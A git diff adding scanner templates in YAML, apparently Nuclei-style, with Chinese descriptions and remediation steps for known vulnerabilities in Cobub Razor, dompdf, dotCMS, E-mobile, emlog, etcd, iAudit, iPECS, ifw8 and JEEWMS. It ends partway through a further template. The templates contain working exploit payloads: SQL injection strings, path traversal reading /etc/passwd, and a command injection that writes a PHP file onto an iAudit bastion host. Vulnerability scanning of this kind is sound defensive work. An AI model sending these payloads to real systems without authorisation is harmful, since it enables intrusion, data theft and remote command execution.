+ - type: dsl
+ condition: and
+ dsl:
+ - status_code==200
+ - contains(body,'Fatal error')
+ - '!contains(body,''/razor/tests'')'
+ raw:
+ - |
+ GET /razor/tests/controllers/posteventTest.php HTTP/1.1
+ Host: {{Hostname}}
+ req-condition: true
diff --git a/config/51pwn/yaml/cobubrazor/cobubrazor_v8-posttagTest-info.yaml b/config/51pwn/yaml/cobubrazor/cobubrazor_v8-posttagTest-info.yaml
new file mode 100755
index 000000000..0f2ea5ad1
--- /dev/null
+++ b/config/51pwn/yaml/cobubrazor/cobubrazor_v8-posttagTest-info.yaml
@@ -0,0 +1,36 @@
+id: cobubrazor_v8-posttagTest-info
+info:
+ name: cobubrazor_v8_tests_controllers_posttagTest.php_物理路径泄露
+ author:
+ - jim2g
+ description: |
+ cobubrazor_v8_tests_controllers_posttagTest.php_物理路径泄露
+ 由于网站运维人员疏忽,存放敏感信息的文件被泄露或由于网站运行出错导致敏感信息泄露或返回敏感信息的无授权接口泄露。通过这些信息,给攻击者渗透提供了非常多的有用信息。严重可造成大量数据泄露。
+ severity: medium
+ remediation: |
+ 官方修复方案:
+ 1、建议用户到官方获取最新补丁或者最新版本程序:
+ http://www.cobub.com/cobub-razor/
+ 临时修复方案:
+ 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面
+ 2、将敏感信息进行加密存储,非必要不可发送前端
+ 3、发送敏感信息时需加密传输,如有必要需脱敏处理
+ 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。
+ 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口
+ 令、会话标识jsessionid等), 防止敏感信息泄漏。
+ 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓
+ 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。
+ 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证
+requests:
+- matchers:
+ - type: dsl
+ condition: and
+ dsl:
+ - status_code==200
+ - contains(body,'Fatal error')
+ - '!contains(body,''/razor/tests'')'
+ raw:
+ - |
+ GET /razor/tests/controllers/posttagTest.php HTTP/1.1
+ Host: {{Hostname}}
+ req-condition: true
diff --git a/config/51pwn/yaml/cobubrazor/cobubrazor_v8-postusinglogTest-info.yaml b/config/51pwn/yaml/cobubrazor/cobubrazor_v8-postusinglogTest-info.yaml
new file mode 100755
index 000000000..24121f4a1
--- /dev/null
+++ b/config/51pwn/yaml/cobubrazor/cobubrazor_v8-postusinglogTest-info.yaml
@@ -0,0 +1,36 @@
+id: cobubrazor_v8-postusinglogTest-info
+info:
+ name: cobubrazor_v8_tests_controllers_postusinglogTest.php_物理路径泄露
+ author:
+ - jim2g
+ description: |
+ cobubrazor_v8_tests_controllers_postusinglogTest.php_物理路径泄露
+ 由于网站运维人员疏忽,存放敏感信息的文件被泄露或由于网站运行出错导致敏感信息泄露或返回敏感信息的无授权接口泄露。通过这些信息,给攻击者渗透提供了非常多的有用信息。严重可造成大量数据泄露。
+ severity: medium
+ remediation: |
+ 官方修复方案:
+ 1、建议用户到官方获取最新补丁或者最新版本程序:
+
+ 临时修复方案:
+ 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面
+ 2、将敏感信息进行加密存储,非必要不可发送前端
+ 3、发送敏感信息时需加密传输,如有必要需脱敏处理
+ 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。
+ 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口
+ 令、会话标识jsessionid等), 防止敏感信息泄漏。
+ 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓
+ 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。
+ 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证
+requests:
+- matchers:
+ - type: dsl
+ condition: and
+ dsl:
+ - status_code==200
+ - contains(body,'Fatal error')
+ - '!contains(body,''/razor/tests'')'
+ raw:
+ - |
+ GET /razor/tests/controllers/postusinglogTest.php HTTP/1.1
+ Host: {{Hostname}}
+ req-condition: true
diff --git a/config/51pwn/yaml/cobubrazor/cobubrazor_v8-view_fixt2-info.yaml b/config/51pwn/yaml/cobubrazor/cobubrazor_v8-view_fixt2-info.yaml
new file mode 100755
index 000000000..9af673852
--- /dev/null
+++ b/config/51pwn/yaml/cobubrazor/cobubrazor_v8-view_fixt2-info.yaml
@@ -0,0 +1,36 @@
+id: cobubrazor_v8-view_fixt2-info
+info:
+ name: cobubrazor_v8_tests_fixtures_view_fixt2.php_物理路径泄露
+ author:
+ - jim2g
+ description: |
+ cobubrazor_v8_tests_fixtures_view_fixt2.php_物理路径泄露
+ 由于网站运维人员疏忽,存放敏感信息的文件被泄露或由于网站运行出错导致敏感信息泄露或返回敏感信息的无授权接口泄露。通过这些信息,给攻击者渗透提供了非常多的有用信息。严重可造成大量数据泄露。
+ severity: medium
+ remediation: |
+ 官方修复方案:
+ 1、建议用户到官方获取最新补丁或者最新版本程序:
+
+ 临时修复方案:
+ 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面
+ 2、将敏感信息进行加密存储,非必要不可发送前端
+ 3、发送敏感信息时需加密传输,如有必要需脱敏处理
+ 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。
+ 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口
+ 令、会话标识jsessionid等), 防止敏感信息泄漏。
+ 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓
+ 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。
+ 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证
+requests:
+- matchers:
+ - type: dsl
+ condition: and
+ dsl:
+ - status_code==200
+ - contains(body,'Fatal error')
+ - '!contains(body,''/razor/tests'')'
+ raw:
+ - |
+ GET /razor/tests/fixtures/view_fixt2.php HTTP/1.1
+ Host: {{Hostname}}
+ req-condition: true
diff --git a/config/51pwn/yaml/dompdf/CVE-2014-2383.yaml b/config/51pwn/yaml/dompdf/CVE-2014-2383.yaml
new file mode 100755
index 000000000..42f103dce
--- /dev/null
+++ b/config/51pwn/yaml/dompdf/CVE-2014-2383.yaml
@@ -0,0 +1,41 @@
+id: CVE-2014-2383
+info:
+ name: Arbitrary file read in dompdf < v0.6.0
+ author:
+ - l0ne1y
+ description: |-
+ dompdf 任意文件读取漏洞
+ dompdf是一套HTML到PDF的转换工具。该工具采用样式驱动,支持下载并读取外部样式、整个样式标签和单个HTML元素的样式属性等。
+
+ dompdf 0.6.0:beta3及之前版本的dompdf.php文件中存在安全漏洞,当使用DOMPDF_ENABLE_PHP时,攻击者可借助PHP协议和‘input_file’参数利用该漏洞绕过改变根目录保护机制,读取任意文件。
+ severity: medium
+ remediation: |-
+ 官方修复方案:
+ 1、建议用户到官方获取最新补丁或者最新版本程序:
+ /~https://github.com/dompdf/dompdf
+
+ 临时修复方案:
+ 1、过滤\".\",使用户在url中不能回溯上级目录。
+ 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。
+ 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。
+ 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。
+ 5、用户下载文件之前进行权限校验。
+requests:
+- matchers:
+ - type: word
+ condition: and
+ part: header
+ words:
+ - application/pdf
+ - filename="dompdf_out.pdf"
+ - type: status
+ status:
+ - 200
+ matchers-condition: and
+ path:
+ - '{{BaseURL}}/dompdf.php?input_file=dompdf.php'
+ - '{{BaseURL}}/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=dompdf.php'
+ - '{{BaseURL}}/lib/dompdf/dompdf.php?input_file=dompdf.php'
+ - '{{BaseURL}}/includes/dompdf/dompdf.php?input_file=dompdf.php'
+ method: GET
+ stop-at-first-match: true
diff --git a/config/51pwn/yaml/dotCMS/CVE-2018-17422.yaml b/config/51pwn/yaml/dotCMS/CVE-2018-17422.yaml
new file mode 100755
index 000000000..ef573d04c
--- /dev/null
+++ b/config/51pwn/yaml/dotCMS/CVE-2018-17422.yaml
@@ -0,0 +1,35 @@
+id: CVE-2018-17422
+info:
+ name: dotCMS < 5.0.2 - Open Redirect
+ author:
+ - l0ne1y
+ description: |-
+ dotCMS URL重定向漏洞
+ dotCMS是一套内容管理系统(CMS)。该系统支持RSS订阅、博客、论坛等模块,并具有易于扩展和构建的特点。
+
+ dotCMS 5.0.2之前版本中存在安全漏洞。攻击者可借助‘FORWARD_URL’参数或‘hostname’参数利用该漏洞将用户重定向到任意网站并实施钓鱼攻击。
+ severity: medium
+ remediation: |-
+ 官方修复方案:
+ 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
+ /~https://github.com/dotCMS/core/
+
+ 临时修复方案:
+ 1、代码固定跳转地址,不让用户控制变量。
+ 2、跳转目标地址采用白名单映射机制、只对合法的 URL 做跳转。
+ 3、合理充分的校验校验跳转的目标地址,非己方地址时告知用户跳转风险。
+requests:
+- matchers:
+ - type: word
+ part: body
+ words:
+ - self.location = 'http://www.bing.com'
+ - type: status
+ status:
+ - 200
+ matchers-condition: and
+ path:
+ - '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://www.bing.com'
+ - '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=bing.com'
+ method: GET
+ stop-at-first-match: true
diff --git a/config/51pwn/yaml/e-mobile/E_mobile-sqli-flowimg.yaml b/config/51pwn/yaml/e-mobile/E_mobile-sqli-flowimg.yaml
new file mode 100755
index 000000000..d43533e16
--- /dev/null
+++ b/config/51pwn/yaml/e-mobile/E_mobile-sqli-flowimg.yaml
@@ -0,0 +1,42 @@
+id: E_mobile-sqli-flowimg
+info:
+ name: 泛微 E-mobile flowimg.php SQL注入漏洞
+ author:
+ - 折跃
+ description: |-
+ 泛微 E-mobile flowimg.php SQL注入漏洞
+ E-Mobile一款由上海泛微网络科技股份有限公司开发的移动办公产品,专门为手机、平板电脑等移动终端用户精心打造的移动办公产品,分浏览器版和客户端版,客户端版支持主流的移动客户端,如iPhone、ipad、android、windows等。
+
+ 泛微 E-mobile中存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。
+ reference:
+ - ""
+ severity: high
+ remediation: |-
+ 官方修复方案:
+ 1、建议用户到官方获取最新补丁或者最新版本程序:
+ https://www.weaver.com.cn/
+
+ 临时修复方案:
+ 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。
+ 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。
+ 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。
+ 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。
+ 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。
+ 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。
+ 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。
+ 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。
+requests:
+- matchers:
+ - type: dsl
+ condition: and
+ dsl:
+ - status_code==200
+ - duration >= 5
+ path:
+ - '{{BaseURL}}/E-mobile/flowimg.php?RUN_ID=1%20AND%20%28SELECT%20%2a%20FROM%20%28SELECT%28SLEEP%285%29%29%29LkEu%29'
+ method: GET
+ headers:
+ Host: '{{Hostname}}'
+ req-condition: true
+variables:
+ verify: '{{rand_text_alphanumeric(32,"")}}'
diff --git a/config/51pwn/yaml/e-mobile/wooyun-2015-0126024_2.yaml b/config/51pwn/yaml/e-mobile/wooyun-2015-0126024_2.yaml
new file mode 100755
index 000000000..ca3f748a8
--- /dev/null
+++ b/config/51pwn/yaml/e-mobile/wooyun-2015-0126024_2.yaml
@@ -0,0 +1,40 @@
+id: wooyun-2015-0126024_2
+info:
+ name: 泛微E-mobile flowhave_page.php SQL注入
+ author:
+ - 折跃
+ description: |-
+ 泛微 E-mobile flowhave_page.php SQL注入漏洞
+ E-Mobile一款由上海泛微网络科技股份有限公司开发的移动办公产品,专门为手机、平板电脑等移动终端用户精心打造的移动办公产品,分浏览器版和客户端版,客户端版支持主流的移动客户端,如iPhone、ipad、android、windows等。
+
+ 泛微 E-mobile中存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。
+ severity: high
+ remediation: |-
+ 官方修复方案:
+ 1、建议用户到官方获取最新补丁或者最新版本程序:
+ https://www.weaver.com.cn/
+
+ 临时修复方案:
+ 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。
+ 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。
+ 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。
+ 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。
+ 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。
+ 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。
+ 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。
+ 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。
+requests:
+- matchers:
+ - type: dsl
+ condition: and
+ dsl:
+ - status_code==200
+ - (body_1 == body_2) && (body_2 != body_3)
+ path:
+ - '{{BaseURL}}/E-mobile/flow/flowhave_page.php?detailid=2,3'
+ - '{{BaseURL}}/E-mobile/flow/flowhave_page.php?detailid=2,3+RLIKE+(SELECT+(CASE+WHEN+(1351=1351)+THEN+0x322c33+ELSE+0x28+END))'
+ - '{{BaseURL}}/E-mobile/flow/flowhave_page.php?detailid=2,3+RLIKE+(SELECT+(CASE+WHEN+(1351=1352)+THEN+0x322c33+ELSE+0x28+END))'
+ method: GET
+ headers:
+ Host: '{{Hostname}}'
+ req-condition: true
diff --git a/config/51pwn/yaml/emlog/CVE-2021-3293.yaml b/config/51pwn/yaml/emlog/CVE-2021-3293.yaml
new file mode 100755
index 000000000..e3497ff2d
--- /dev/null
+++ b/config/51pwn/yaml/emlog/CVE-2021-3293.yaml
@@ -0,0 +1,34 @@
+id: CVE-2021-3293
+info:
+ name: emlog 5.3.1 Path Disclosure
+ author:
+ - l0ne1y
+ description: |-
+ Emlog 路径泄露漏洞
+ Emlog是Emlog个人开发者的一套基于PHP和MySQL的CMS建站系统。
+
+ emlog v5.3.1 版本存在路径遍历漏洞,该漏洞源于允许攻击者查看webroot/文件的路径。
+ severity: low
+ remediation: |-
+ 官方修复方案:
+ 1、建议用户到官方获取最新补丁或者最新版本程序:
+ /~https://github.com/emlog/emlog/
+
+ 临时修复方案:
+ 1、屏蔽错误信息
+requests:
+- matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ condition: and
+ words:
+ - Warning
+ - on line
+ - expects parameter
+ matchers-condition: and
+ raw:
+ - |
+ GET /t/index.php?action[]=aaaa HTTP/1.1
+ Host: {{Hostname}}
diff --git a/config/51pwn/yaml/etcd/http-etcd-unauthenticated-api-data-leak.yaml b/config/51pwn/yaml/etcd/http-etcd-unauthenticated-api-data-leak.yaml
new file mode 100755
index 000000000..469017abe
--- /dev/null
+++ b/config/51pwn/yaml/etcd/http-etcd-unauthenticated-api-data-leak.yaml
@@ -0,0 +1,38 @@
+id: http-etcd-unauthenticated-api-data-leak
+info:
+ name: etcd Unauthenticated HTTP API Leak
+ author:
+ - l0ne1y
+ description: |-
+ etcd 未经身份验证的 HTTP API 泄漏
+ etcd HTTP API 无需身份验证即可访问。这可能会导致密钥被泄露,其中可能包含敏感信息。它还允许用户在没有身份验证的情况下更改和删除密钥。因此,远程攻击者不仅可以识别用户名和密码等敏感信息,还可以更改或删除这些数据。
+ severity: high
+ remediation: |-
+ 官方修复方案:
+ 升级到官方最新版本:
+ https://etcd.io/
+
+ 临时修复方案:
+ 1.不要将 Etcd 服务对外开放;
+ 2.配置合适的安全认证方案。
+requests:
+- matchers:
+ - type: word
+ condition: and
+ part: body
+ words:
+ - '"roles"'
+ - '"permissions"'
+ - '"role"'
+ - '"kv"'
+ - type: status
+ status:
+ - 200
+ - type: word
+ part: header
+ words:
+ - text/plain
+ matchers-condition: and
+ path:
+ - '{{BaseURL}}/v2/auth/roles'
+ method: GET
diff --git a/config/51pwn/yaml/exacqVision/CVE-2020-9047.yaml b/config/51pwn/yaml/exacqVision/CVE-2020-9047.yaml
new file mode 100755
index 000000000..12f0c188c
--- /dev/null
+++ b/config/51pwn/yaml/exacqVision/CVE-2020-9047.yaml
@@ -0,0 +1,78 @@
+id: CVE-2020-9047
+info:
+ name: exacqVision Web Service RCE
+ author:
+ - dwisiswant0
+ tags:
+ - cve
+ - cve2020
+ - rce
+ - exacqvision
+ - service
+ description: |-
+ Johnson Controls exacqVision Enterprise Manager和Web Service 数据伪造问题漏洞
+
+ Johnson Controls exacqVision Enterprise Manager和exacqVision Web Service都是美国江森自控(Johnson Controls)公司的产品。exacqVision Enterprise Manager是一套企业视频管理软件。exacqVision Web Service是一款支持使用Web浏览器查看实时视频,搜索和播放视频的程序。
+
+ Johnson Controls exacqVision Web Service 20.06.3.0及之前版本和Enterprise Manager 20.06.4.0及之前版本中存在数据伪造问题漏洞,该漏洞源于软件没有正确验证数据的加密签名。攻击者可利用该漏洞下载和运行恶意可执行文件。
+ reference:
+ - /~https://github.com/norrismw/cve-2020-9047
+ - https://www.johnsoncontrols.com/cyber-solutions/security-advisories
+ - https://www.us-cert.gov/ics/advisories/icsa-20-170-01
+ severity: high
+ classification:
+ cve-id:
+ - cve-2020-9047
+ cwe-id:
+ - cwe-347
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.2
+ remediation: |-
+ 官方修复方案:
+ 1、建议用户到官方获取最新补丁或者最新版本程序:https://www.johnsoncontrols.com/cyber-solutions/security-advisories
+
+ 临时修复方案:
+ 1、配置所有的安全机制
+ 2、最小原则,关掉或限制不使用的服务
+ 3、更改默认账户信息
+ 4、使用日志和警报
+ 5、回显信息不显示任何与实际错误相关的信息
+ 6、检查和修复安全配置项
+ ```
+requests:
+- matchers:
+ - type: word
+ condition: or
+ part: body
+ words:
+ - 3.10.4.72058
+ - 3.12.4.76544
+ - 3.8.2.67295
+ - 7.0.2.81005
+ - 7.2.7.86974
+ - 7.4.3.89785
+ - 7.6.4.94391
+ - 7.8.2.97826
+ - 8.0.6.105408
+ - 8.2.2.107285
+ - 8.4.3.111614
+ - 8.6.3.116175
+ - 8.8.1.118913
+ - 9.0.3.124620
+ - 9.2.0.127940
+ - 9.4.3.137684
+ - 9.6.7.145949
+ - 9.8.4.149166
+ - 19.03.3.152166
+ - 19.06.4.157118
+ - 19.09.4.0
+ - 19.12.2.0
+ - 20.03.2.0
+ - 20.06.3.0
+ - type: status
+ status:
+ - 200
+ matchers-condition: and
+ path:
+ - '{{BaseURL}}/version.web'
+ method: GET
diff --git a/config/51pwn/yaml/feifeicms/feifeicms-lfr.yaml b/config/51pwn/yaml/feifeicms/feifeicms-lfr.yaml
new file mode 100755
index 000000000..2cd28644d
--- /dev/null
+++ b/config/51pwn/yaml/feifeicms/feifeicms-lfr.yaml
@@ -0,0 +1,45 @@
+id: feifeicms-lfr
+info:
+ name: FeiFeiCms Local File Read
+ author:
+ - l0ne1y
+ tags:
+ - feifeicms
+ - lfi
+ description: |-
+ 飞飞CMS存在后台任意文件读取漏洞
+ FeiFeiCms是一款PHP电影程序。
+
+ FeiFeiCms v4.1.190209存在任意文件读取漏洞,漏洞源于未能对输入的../进行过滤,攻击者可利用该漏洞读取任意文件。
+ reference:
+ - https://www.cnblogs.com/jinqi520/p/10202615.html
+ - https://gitee.com/daicuo/feifeicms
+ severity: high
+ remediation: |-
+ **官方修复方案**
+ 请在官方链接下载最新版本
+ https://www.feifeicms.org/
+
+ **临时修复方案**
+ 1、过滤\".\",使用户在url中不能回溯上级目录。
+ 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。
+ 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。
+ 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。
+ 5、用户下载文件之前进行权限校验。
+requests:
+- matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ condition: and
+ part: body
+ words:
+ - frps dashboard
+ - type: status
+ status:
+ - 200
+ matchers-condition: and
+ path:
+ - '{{BaseURL}}/static/'
+ method: GET
diff --git "a/config/51pwn/yaml/iAudit\350\277\220\347\273\264\345\256\241\350\256\241\347\263\273\347\273\237/Qilin-Bastion-HostRce.yaml" "b/config/51pwn/yaml/iAudit\350\277\220\347\273\264\345\256\241\350\256\241\347\263\273\347\273\237/Qilin-Bastion-HostRce.yaml"
new file mode 100755
index 000000000..208bb8c2c
--- /dev/null
+++ "b/config/51pwn/yaml/iAudit\350\277\220\347\273\264\345\256\241\350\256\241\347\263\273\347\273\237/Qilin-Bastion-HostRce.yaml"
@@ -0,0 +1,34 @@
+id: Qilin-Bastion-HostRce
+info:
+ name: iAudit-fortressaircraft-rce
+ author:
+ - l0ne1y
+ description: |-
+ 中远麒麟iAudit运维审计系统未授权远程命令执行漏洞
+ 中远麒麟iAudit运维审计系统,是北京中远麒麟科技有限公司开发的软硬件一体化统一安全运维平台(堡垒机),该产品支持对企业运维人员在运维过程中进行统一身份认证、统一授权、统一审计、统一监控。
+
+ 中远麒麟iAudit运维审计系统存在未授权远程命令执行漏洞,近期已发现针对该漏洞的在野利用。get_luser_by_sshport.php接口获取路径变量时,存在未经过滤的字符串拼接,攻击者可利用该漏洞注入命令,获取堡垒机系统权限。
+ severity: critical
+ remediation: |-
+ 官方修复方案:
+ 1、建议用户到官方获取最新补丁或者最新版本程序:https://www.tosec.com.cn/
+
+ 临时修复方案:
+ 1. 禁止将中远麒麟iAudit运维审计系统映射到公网
+ 2. 在安管设备对get_luser_by_sshport.php接口做访问限制
+requests:
+- matchers:
+ - type: dsl
+ condition: and
+ dsl:
+ - status_code_1==200 && status_code_2==200
+ - contains(body_2,verify)
+ matchers-condition: and
+ path:
+ - '{{BaseURL}}/get_luser_by_sshport.php?clientip=1;echo%20"">/opt/freesvr/web/htdocs/freesvr/audit/{{filename}}.php;&clientport=1'
+ - '{{BaseURL}}/{{filename}}.php'
+ method: GET
+ req-condition: true
+variables:
+ filename: '{{rand_text_alpha(6, "abc")}}'
+ verify: '{{rand_text_alphanumeric(8,"")}}'
diff --git a/config/51pwn/yaml/iPECS NMS 30M/CVE-2018-15138.yaml b/config/51pwn/yaml/iPECS NMS 30M/CVE-2018-15138.yaml
new file mode 100755
index 000000000..524428cd7
--- /dev/null
+++ b/config/51pwn/yaml/iPECS NMS 30M/CVE-2018-15138.yaml
@@ -0,0 +1,36 @@
+id: CVE-2018-15138
+info:
+ name: LG-Ericsson iPECS NMS 30M Directory Traversal
+ author:
+ - l0ne1y
+ description: |-
+ Ericsson-LG iPECS NMS 30M 任意文件读取漏洞
+ Ericsson-LG iPECS NMS 30M是韩国Ericsson-LG公司的一套网络管理解决方案。
+
+ Ericsson-LG iPECS NMS 30M中存在文件读取漏洞。攻击者可借助ipecs-cm/download?filename=../URIs利用该漏洞获取敏感信息(配置文件)。
+ severity: medium
+ remediation: |-
+ 官方修复方案:
+ 1、建议用户到官方获取最新补丁或者最新版本程序:
+ https://www.ipecs.com/
+
+ 临时修复方案:
+ 1、过滤\".\",使用户在url中不能回溯上级目录。
+ 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。
+ 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。
+ 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。
+ 5、用户下载文件之前进行权限校验。
+requests:
+- matchers:
+ - type: regex
+ regex:
+ - root:[x*]:0:0
+ - type: status
+ status:
+ - 200
+ matchers-condition: and
+ path:
+ - '{{BaseURL}}/ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data'
+ - '{{BaseURL}}/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg'
+ method: GET
+ stop-at-first-match: true
diff --git a/config/51pwn/yaml/ifw8/CVE-2019-16313.yaml b/config/51pwn/yaml/ifw8/CVE-2019-16313.yaml
new file mode 100755
index 000000000..11222064b
--- /dev/null
+++ b/config/51pwn/yaml/ifw8/CVE-2019-16313.yaml
@@ -0,0 +1,45 @@
+id: CVE-2019-16313
+info:
+ name: ifw8 Router ROM v4.31 Credential Discovery
+ author:
+ - l0ne1y
+ description: |-
+ ifw8路由器ROM v4.31允许凭据泄漏
+ 智蜂网科技 ifw8 Router ROM是中国智蜂网科技公司的一套路由器操作系统。
+
+ 智蜂网科技 ifw8 Router ROM v4.31版本中存在信息泄露漏洞。攻击者可通过读取action/usermanager.htm HTML源码利用该漏洞泄露凭证。
+ severity: high
+ remediation: |-
+ 官方修复方案:
+ 1、建议用户到官方获取最新补丁或者最新版本程序:
+ http://www.ifw8.cn/
+
+ 临时修复方案:
+ 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面
+ 2、将敏感信息进行加密存储,非必要不可发送前端
+ 3、发送敏感信息时需加密传输,如有必要需脱敏处理
+ 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。
+ 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口
+ 令、会话标识jsessionid等), 防止敏感信息泄漏。
+ 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓
+ 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。
+ 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证
+requests:
+- matchers:
+ - type: regex
+ part: body
+ regex:
+ - \*\*\*\*\*\*<\/td>
+ - type: status
+ status:
+ - 200
+ extractors:
+ - type: regex
+ regex:
+ - | \*\*\*\*\*\*<\/td>
+ group: 1
+ part: body
+ matchers-condition: and
+ path:
+ - '{{BaseURL}}/action/usermanager.htm'
+ method: GET
diff --git a/config/51pwn/yaml/jeewms/jeewms-lfi.yaml b/config/51pwn/yaml/jeewms/jeewms-lfi.yaml
new file mode 100755
index 000000000..5bb835263
--- /dev/null
+++ b/config/51pwn/yaml/jeewms/jeewms-lfi.yaml
@@ -0,0 +1,42 @@
+id: jeewms-lfi
+info:
+ name: JEEWMS LFI
+ author:
+ - l0ne1y
+ description: |-
+ JEEWMS 文件读取
+ jeewms是一个基于JAVA的仓库管理系统,是由灵鹿谷科技主导的开源项目,WMS在经过多家公司上线运行后,为了降低物流仓储企业的信息化成本,决定全面开源此产品。针对有特殊信息化需求的企业,提供高性价比的实施服务。
+ jeewms showOrDownByurl.do页面存在任意文件读取漏洞,攻击人员通过目录遍历攻击可以获取系统文件及服务器的配置文件等等。
+ severity: high
+ remediation: |-
+ 官方修复方案:
+ 1、建议用户到官方获取最新补丁或者最新版本程序:
+ https://gitee.com/erzhongxmu/jeewms?utm_source=alading&utm_campaign=repo
+
+ 临时修复方案:
+ 1、过滤\".\",使用户在url中不能回溯上级目录。
+ 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。
+ 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。
+ 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。
+ 5、用户下载文件之前进行权限校验。
+requests:
+- matchers:
+ - type: regex
+ condition: or
+ part: body
+ regex:
+ - 'root:.*:0:0:'
+ - \[(font|extension|file)s\]
+ - type: status
+ status:
+ - 200
+ matchers-condition: and
+ raw:
+ - |
+ GET /systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+ - |
+ GET /systemController/showOrDownByurl.do?down=&dbPath=../Windows/win.ini HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
diff --git a/config/51pwn/yaml/jitsi/CVE-2021-26812.yaml b/config/51pwn/yaml/jitsi/CVE-2021-26812.yaml
new file mode 100755
index 000000000..bc9433707
--- /dev/null
+++ b/config/51pwn/yaml/jitsi/CVE-2021-26812.yaml
@@ -0,0 +1,52 @@
+id: CVE-2021-26812
+info:
+ name: Moodle jitsi plugin XSS
+ author:
+ - aceseven (digisec360)
+ tags:
+ - cve
+ - cve2021
+ - moodle
+ - jitsi
+ - xss
+ - plugin
+ description: |-
+ Jitsi 跨站脚本漏洞
